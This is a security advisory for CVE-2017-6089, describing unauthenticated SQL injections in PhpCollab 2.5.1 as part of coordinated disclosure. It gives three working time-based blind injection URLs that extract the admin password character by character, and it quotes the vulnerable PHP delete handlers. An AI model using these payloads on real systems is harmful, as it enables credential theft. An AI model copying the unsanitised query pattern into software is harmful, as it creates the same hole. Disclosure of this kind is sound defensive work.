[CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
We found an SQL injection in the application.
Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
SQL injections
The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.
CVE ID: CVE-2017-6089
Access Vector: remote
Security Risk: Critical
Vulnerability: CWE-89
CVSS Base Score: 10 (Critical)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
Proof of Concept 1
The following HTTP request allows an attacker to extract data using SQL injections in either the project or id parameter  (it requires at least one topic):
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2
http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
Vulnerable code
The vulnerable code is found in topics/deletetopics.php, line 9.
if ($action == "delete") {
    $id = str_replace("**",",",$id);
    $tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
    $tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
    $pieces = explode(",",$id);
    $num = count($pieces);
    connectSql("$tmpquery1");
    connectSql("$tmpquery2");
Proof of Concept 2
The following HTTP request allows an attacker to extract data using SQL injections in the id parameter (it requires at least one saved bookmark):
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
Vulnerable code
The vulnerable code is found in bookmarks/deletebookmarks.php, line 32.
if ($action == "delete") {
    $id = str_replace("**",",",$id);
    $tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
    connectSql("$tmpquery1");
Proof of Concept 3
The following HTTP request allows an attacker to extract some information using SQL injection in the id parameter (it requires at least one calendar entry):
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
Vulnerable code
The vulnerable code is found in calendar/deletecalendar.php, line 31.
if ($action == "delete") {
    $id = str_replace("**",",",$id);
    $tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
    connectSql("$tmpquery1");
Notes
The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.
Solution
Update to the latest version avalaible.
Affected versions
- Version <= 2.5.1
Timeline (dd/mm/yyyy)
- 27/08/2016 : Initial discovery.
- 05/10/2016 : Initial contact.
- 11/10/2016 : GPG Key exchange.
- 19/10/2016 : Advisory sent to vendor.
- 13/02/2017 : First fixes.
- 15/02/2017 : Fixes validation by Sysdream.
- 21/02/2017 : PhpCollab ask to wait before publish.
- 21/06/2017 : New version has been released.
- 29/09/2017 : Public disclosure.
Credits
- Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)